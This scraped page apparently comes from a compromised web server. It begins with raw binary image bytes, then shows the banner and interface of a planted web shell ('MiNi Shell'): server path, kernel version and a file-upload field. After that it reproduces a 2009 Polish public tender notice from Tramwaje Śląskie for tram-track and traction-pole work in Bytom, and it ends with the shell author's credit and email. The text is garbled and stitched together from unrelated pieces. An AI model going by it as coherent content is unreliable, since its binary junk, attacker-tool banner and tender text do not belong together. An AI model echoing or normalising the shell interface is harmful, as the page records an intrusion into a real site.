JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090902/145499-N-2009.html

<p class="kh_header"><b>Chorzów: Posadowienie słupów trakcyjnych na fundamentach wraz z robotami towarzyszącymi w obrębie Pl. Sikorskiego w Bytomiu w ramach  zadania pn.: Naprawa główna torowiska tramwajowego 266 mtp, wymiana 5 rozjazdów z napędami wraz z modernizacją sterowania napędami, wymiana 2 rozjazdów mechanicznych przy Placu Sikorskiego w ul. Jagiellońskiej, ul. Moniuszki w Bytomiu.</b><br>
<b>Numer ogłoszenia: 145499 - 2009; data zamieszczenia: 02.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Tramwaje Śląskie S.A. , ul. Inwalidzka 5, 41-506 Chorzów, woj. śląskie, tel. 032 2466061 (64,65) w. 381, faks 032 2510096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tram-silesia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: komunikacja tramwajowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Posadowienie słupów trakcyjnych na fundamentach wraz z robotami towarzyszącymi w obrębie Pl. Sikorskiego w Bytomiu w ramach  zadania pn.: Naprawa główna torowiska tramwajowego 266 mtp, wymiana 5 rozjazdów z napędami wraz z modernizacją sterowania napędami, wymiana 2 rozjazdów mechanicznych przy Placu Sikorskiego w ul. Jagiellońskiej, ul. Moniuszki w Bytomiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o zamówienie publiczne o wartości mniejszej od kwot określonych w   Rozporządzeniu  Prezesa Rady Ministrów z dnia 19 grudnia 2007r. (Dz. U. 07.241.1762).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.41.26-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 5.000,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie  zamówienia publicznego mogą  ubiegać się  wykonawcy, którzy:
a)   posiadają  uprawnienia  do  wykonywania  określonej  działalności  lub  czynności,
b)posiadają  niezbędną  wiedzę  i  doświadczenie  oraz  dysponują  potencjałem  technicznym i osobami   zdolnymi  do  wykonania  zamówienia  lub  przedstawią  pisemne zobowiązanie innych   podmiotów   do   udostępnienia   potencjału   technicznego   i  osób   zdolnych   do wykonania zamówienia, tj.: 
- udokumentują wykonanie (zakończenie) w ciągu ostatnich pięciu lat co najmniej dwóch zadań w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia o wartości zadania minimum 100.000,00  PLN  brutto każde,
c) znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia i udokumentują posiadane środki finansowe lub zdolność kredytową w wysokości minimum 100.000,00  PLN,
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
2.  Zamawiający dokona oceny spełniania przez wykonawców warunków udziału  w  postępowaniu stwierdzeniem:  spełnia / nie spełnia  na  podstawie  informacji    zawartych  w  dokumentach i oświadczeniach załączonych do oferty.
3.  Wykonawcy  nie spełniający  powyższych warunków zostaną  przez  zamawiającego wykluczeni z niniejszego postępowania.
4.  Zamawiający  zawiadomi niezwłocznie  wykonawcę  o wykluczeniu z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne.
5.  Ofertę   wykonawcy   wykluczonego  na  podstawie  art. 24 ust. 1 i 2  ustawy   Pzp  uznaje  się  za odrzuconą.  
6.  Zamawiający  odrzuci  ofertę,  jeżeli  wystąpi  przynajmniej  jedna  przesłanka  wymieniona  w art. 89 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  W  celu  potwierdzenia,  że  wykonawca   posiada   uprawnienia   do   wykonywania   określonej działalności lub czynności -  wykonawca  winien załączyć do oferty niżej wymagane dokumenty:
a)  aktualny  odpis  z  właściwego rejestru  albo aktualne   zaświadczenie  o wpisie  do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności  gospodarczej,  wystawiony  nie  wcześniej  niż  6 miesięcy  przed upływem terminu składania ofert. Aktualnym  jest  dokument  obrazujący aktualny stan prawny i  faktyczny w odniesieniu do danych zawartych w rejestrze lub ewidencji działalności gospodarczej.
b)  aktualne  zaświadczenie  właściwego   naczelnika    urzędu  skarbowego   potwierdzające,  że wykonawca  nie zalega  z  opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie,  odroczenie  lub rozłożenie na raty zaległych płatności lub wstrzymanie w  całości   wykonania   decyzji   właściwego  organu  -    wystawione   nie  wcześniej   niż 3 miesiące przed upływem terminu składania ofert,
c)  aktualne  zaświadczenie  właściwego  oddziału Zakładu Ubezpieczeń Społecznych lub  Kasy Rolniczego   Ubezpieczenia   Społecznego  potwierdzające,  że  wykonawca   nie   zalega   z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
d)  aktualną   informację  z  Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust.1 pkt 4-8  ustawy Pzp,  wystawioną  nie  wcześniej  niż  6  miesięcy  przed  upływem   terminu składania ofert. Informacja  winna  zawierać  potwierdzenie,  że  osoby  lub  podmioty  występujące w art. 24 ust.1 pkt 4-8 ustawy Pzp  nie  zostały  prawomocnie  skazane  w  związku z postępowaniem o   
udzielenie   zamówienia,   przestępstwo   przekupstwa,   przestępstwo przeciwko     obrotowi gospodarczemu lub inne przestępstwo popełnione w  celu  osiągnięcia korzyści majątkowych.    
e)  aktualną  informację  z  Krajowego  Rejestru  Karnego  w  zakresie określonym w art.24 ust. 1 pkt 9  ustawy Pzp, wystawioną   nie   wcześniej   niż  6  miesięcy   przed    upływem  terminu składania ofert. Informacja winna zawierać potwierdzenie, iż wobec podmiotów występujących w art.24 ust.1 pkt 9  ustawy Pzp  sąd  nie orzekł zakazu ubiegania się o zamówienie, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary.
2.  W celu  potwierdzenia,  że  wykonawca  posiada  niezbędną  wiedzę  i   doświadczenie,  a  także dysponuje   potencjałem   technicznym  i  osobami  zdolnymi   do   wykonania      zamówienia - wykonawca winien załączyć do oferty niżej wymagane dokumenty:
a)  wykaz wykonanych (zakończonych) robót budowlanych w okresie ostatnich   pięciu lat przed dniem   wszczęcia   postępowania  o  udzielenie   zamówienia,  a  jeżeli  okres    prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch  zadań odpowiadających swoim rodzajem  przedmiotowi  zamówienia  o  wartości  minimum  100.000,00  PLN   brutto każde, z podaniem  ich  wartości  oraz  daty,  miejsca  wykonania i odbiorców oraz załączyć  dokumenty  potwierdzające, że roboty  te zostały  wykonana  należycie. Obowiązkiem  wykonawcy  jest   przedłożenie  zamawiającemu   dokumentów,  które  ponad 
wszelką    wątpliwość    udokumentują    spełnienie   wszystkich    postawionych  warunków i  wymagań zamawiającego.
b)  wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w  wykonywaniu  zamówienia, wraz  z  informacjami  na temat ich kwalifikacji zawodowych, doświadczenia  i  wykształcenia  niezbędnych  do  wykonania  zamówienia,  a  także zakresu  wykonywanych przez nich czynności,          
c)  pisemne  zobowiązania  innych  podmiotów do  udostępnienia osób zdolnych do wykonania zamówienia,   jeżeli   w  wykazie,  o   którym  mowa  w  pkt 2 lit. b) 
wykonawca   wskazał  osoby  (pracowników innego podmiotu), którymi będzie dysponował,
d)  dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia przewidziane ustawą Prawo budowlane,  Rozporządzeniem  w  sprawie  samodzielnych  funkcji  technicznych  w budownictwie. Wymagane jest  również załączenie aktualnego   zaświadczenia stwierdzającego przynależność  do  właściwej  izby   samorządu   zawodowego   dla  każdej osoby pełniącej samodzielną funkcję techniczną w budownictwie i  wniesienie opłaty od odpowiedzialności cywilnej.
3.  W  celu  potwierdzenia,  że   wykonawca   znajduje  się  w  sytuacji   ekonomicznej  i   finansowej zapewniającej   wykonanie  zamówienia,  wykonawca  winien  załączyć  do oferty niżej wymagane dokumenty: 
a) informację   banku   lub     spółdzielczej   kasy  oszczędnościowo-kredytowej,   w którym wykonawca   posiada    rachunek,    potwierdzającą   wysokość       posiadanych    środków finansowych lub zdolność kredytową wykonawcy w wysokości minimum 100.000,00 PLN, wystawioną  nie  wcześniej   niż 3 miesiące    przed     upływem    terminu     składania  ofert ( w  przypadku określenia przez bank lub spółdzielczą  kasę oszczędnościowo - kredytową,  kwoty  środków   finansowych lub   zdolności kredytowej wykonawcy  liczbą  cyfr, zamawiający  przyjmuje do oceny najmniejszą  kwotę wynikającą z tych cyfr).
b)  polisę,  a   w   przypadku   jej   braku   inny  dokument    potwierdzający,   że   wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
4.  W  celu potwierdzenia,   że   wykonawca   wniósł   wymagane   wadium  w  formie   niepieniężnej, zamawiający żąda załączenia do oferty oryginału dokumentu świadczącego o wniesieniu wadium w  formie niepieniężnej lub kopię dokumentu potwierdzającego wniesienia wadium w pieniądzu.
5.  Wykonawca winien załączyć do oferty również:  
a)  Formularz  oferty;
b)  Formularz cenowy (kosztorys ofertowy);
c)  Wykaz części zamówienia powierzonej podwykonawcom;
d)  Oświadczenie wykonawcy zgodnie z art. 22 ust. 1 ustawy Pzp;
e)  Oświadczenie   wykonawcy o nie  podleganiu wykluczeniu z art. 24 ust. 1 i 2 ustawy  Pzp; 
f)  Oświadczenie wykonawcy dotyczące przedmiotu zamówienia;
g)  Harmonogram rzeczowo-finansowy;
h)  Wzór umowy zaparafowany  na  każdej zapisanej  stronie przez   osobę/y   uprawnioną/e.
6.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza  terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1:
1). lit. a), b), c) i e) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2). lit. d)  składa   zaświadczenie   właściwego    organu    sądowego   lub    administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp.
 7.  Dokumenty,  o  których  mowa  w pkt 6  ppkt 1  lit. a) i c) oraz  ppkt 2,  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym  mowa  w pkt 6  ppkt 1  lit. b),  powinien  być  wystawiony  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8.  Jeżeli  w  kraju  pochodzenia  osoby lub w kraju,  w  którym  wykonawca  ma siedzibę lub miejsce zamieszkania,  nie wydaje się dokumentów,  o których mowa w pkt 6, zastępuje się je dokumentem   zawierającym   oświadczenie  złożone   przed   notariuszem,  właściwym   organem sądowym, administracyjnym   albo    organem   samorządu    zawodowego   lub   gospodarczego odpowiednio  kraju  pochodzenia  osoby  lub  kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania.
9.  Dokumenty  sporządzone  w  języku  obcym  winny  być  złożone  wraz  z  tłumaczeniem  na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Gwarancja - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.tram-silesia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Tramwaje Śląskie S.A. 
ul. Inwalidzka 5,
41-506 Chorzów - pokój nr 16 piętro I.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 09:45, miejsce: Tramwaje Śląskie S.A. (Dyrekcja), ul. Inwalidzka 5, 41-506 Chorzów - sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com